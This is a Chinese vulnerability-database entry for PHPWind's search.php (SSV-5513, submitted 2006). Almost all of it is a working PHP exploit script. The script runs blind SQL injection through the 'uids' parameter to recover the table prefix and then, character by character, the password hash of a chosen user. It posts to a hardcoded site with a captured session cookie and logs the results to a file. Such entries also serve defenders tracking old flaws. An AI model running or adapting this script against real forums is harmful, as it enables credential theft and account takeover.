phpwind search.php 0day Exp

基本字段

漏洞编号：: SSV-5513

披露/发现时间：: 未知

提交时间：: 2006-11-10

漏洞等级：

漏洞类别：: 嵌入恶意代码

影响组件：: PHPWind

漏洞作者：: 未知

提交者：: Knownsec

CVE-ID：: 补充

CNNVD-ID：: 补充

CNVD-ID：: 补充

ZoomEye Dork：: 补充

来源

漏洞详情

暂无漏洞详情

PoC (非 pocsuite 插件)

贡献者 Knownsec 共获得 1.05KB

<html> <head> <meta http-equiv="Content-Type" content="text/html; charset=gb2312"> <title>phpwind </title> <style type="text/css"> body,td { font-family: "Tahoma"; font-size: "12px"; line-height: "150%"; } .smlfont { font-family: "Tahoma"; font-size: "11px"; } .INPUT { FONT-SIZE: "12px"; COLOR: "#000000"; BACKGROUND-COLOR: "#FFFFFF"; height: "18px"; border: "1px solid #666666"; padding-left: "2px"; } .redfont { COLOR: "#A60000"; } a:link,a:visited,a:active { color: "#000000"; text-decoration: underline; } a:hover { color: "#465584"; text-decoration: none; } .top {BACKGROUND-COLOR: "#CCCCCC"} .firstalt {BACKGROUND-COLOR: "#EFEFEF"} .secondalt {BACKGROUND-COLOR: "#F5F5F5"} </style> <center>The Exploiet Of The All Phpwind Version</center> <center> BY 剑心</center> <?php ini_set("max_execution_time",0); error_reporting(7); $path="/search.php"; $server='luoq.net'; $cookie='lastfid=0; ol_offset=27160; ipstate=1160671066; ipfrom=7641b3edc60a722a72f5a76e55ce6e97%09%B1%B1%BE%A9%CA%D0%B7%BD%D5%FD%BF%ED%B4%F8%0D; lastvisit=0%091161077981%09%2Fsearch.php%3F; auth=3435393735327c313136313037363538383230367c327c6261646567677c31303030303030303030303030303030; PHPSESSID=3b11a9ca33071f0b06c9aab0995918a7; cknum=BlJQUwZSVgtXAz9sBFEAWgtdU1NXUANSWAEFDFNQVVYDUA1QB1tTUQAHVAE%3D'; $useragent="Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 1.1.4322)"; $uid=2; $_GET['uid']&&$uid=$_GET['uid']; $tid=539264; $mask='没有查找匹配的内容'; $count=0; //$testing=1; //$testing=$_GET['test']; if($testing) {preg_match('/X-Powered-By: php\/(.+)/ie',send(""),$php);echo$php[1];die();} //$debug=1; $temp=md5(rand(1,100)+microtime()); $cmd="step=3&pwuser=".$temp."loveshell"."&uids=-1".$sql."/*j&184288238=kkkk&276791066=jjjjjj"; $response=send($cmd); preg_match('/FROM (.+)threads/ie',$response,$match); $pre=$match[1]; if ($match[1]) echo 'Good Job!Wo Got The pre: '.$match[1]." "; else if (strpos($response,'value="登录"')) die("You Are Not Login!Try to get anthor Cookie and Useragen value! "); else {echo "Maybe It is not vul! ";die();} echo "Try to Get the uid=$uid 's Password:"; $log=fopen('log.txt','a+'); for($i=0;$i<16;$i++) { $type=0; $sub=$i+9; $temp=md5(rand(1,100)+microtime()); $sql=" union select $tid from ".$pre."members where uid=$uid and ord(mid(password,$sub,1)) >47 and ord(mid(password,$sub,1))<58"; $sql=urlencode($sql); $temp=md5(rand(1,100)+microtime()); $cmd="step=3&pwuser=".$temp."loveshell"."&uids=-1)".$sql."/*.&184288238=kkkk&276791066=jjjjjj"; if(!strpos(send($cmd),$mask)) { $type=0; for($m=48;$m<=57;$m++){ $temp=md5(rand(1,100)+microtime()); $sql=" union select $tid from ".$pre."members where uid=$uid and ord(mid(password,$sub,1))=$m"; $sql=urlencode($sql); $temp=md5(rand(1,100)+microtime()); $cmd="step=3&pwuser=".$temp."loveshell"."&uids=-1)".$sql."/*.&184288238=kkkk&276791066=jjjjjj"; if(!strpos(send($cmd),$mask)) { echo chr($m); fputs($log,chr($m)); break; } continue; } continue; } $sql=" union select $tid from ".$pre."members where uid=$uid and ord(mid(password,$sub,1)) >96 and ord(mid(password,$sub,1))<123"; $sql=urlencode($sql); $temp=md5(rand(1,10000)+microtime()); $cmd="step=3&pwuser=".$temp."loveshell"."&uids=-1)".$sql."/*.&184288238=kkkk&276791066=jjjjjj"; if(!strpos(send($cmd),$mask)) { $type=1; for($m=97;$m<=122;$m++){ $temp=md5(rand(1,100)+microtime()); $sql=" union select $tid from ".$pre."members where uid=$uid and ord(mid(password,$sub,1))=$m"; $sql=urlencode($sql); $temp=md5(rand(1,100)+microtime()); $cmd="step=3&pwuser=".$temp."loveshell"."&uids=-1)".$sql."/*.&184288238=kkkk&276791066=jjjjjj"; if(!strpos(send($cmd),$mask)) { echo chr($m); fputs($log,chr($m)); break; } continue; } continue; } echo "error! "; die("Shit!May be the data you post is Not valid!Try anthor UID"); } fclose($log); echo " Done!We Post $count times! "; function send($cmd) { global $path,$server,$cookie,$count,$useragent,$debug; $count=$count+1; $message = "POST ".$path."? HTTP/1.1"; $message .= "Accept: */*"; $message .= "Accept-Language: zh-cn"; $message .= "Referer: http://".$server.$path.""; $message .= "Content-Type: application/x-www-form-urlencoded"; $message .= "User-Agent: ".$useragent.""; $message .= "Host: ".$server.""; $message .= "Content-length: ".strlen($cmd).""; $message .= "Connection: Keep-Alive"; $message .= "Cookie: ".$cookie.""; $message .= ""; $message .= $cmd.""; $fd = fsockopen( $server, 80 ); fputs($fd,$message); $resp = "<pre>"; while($fd&&!feof($fd)) { $resp .= fread($fd,1024); } fclose($fd); $resp .="</pre>"; if($debug) {echo $cmd;echo $resp;} return $resp; } ?>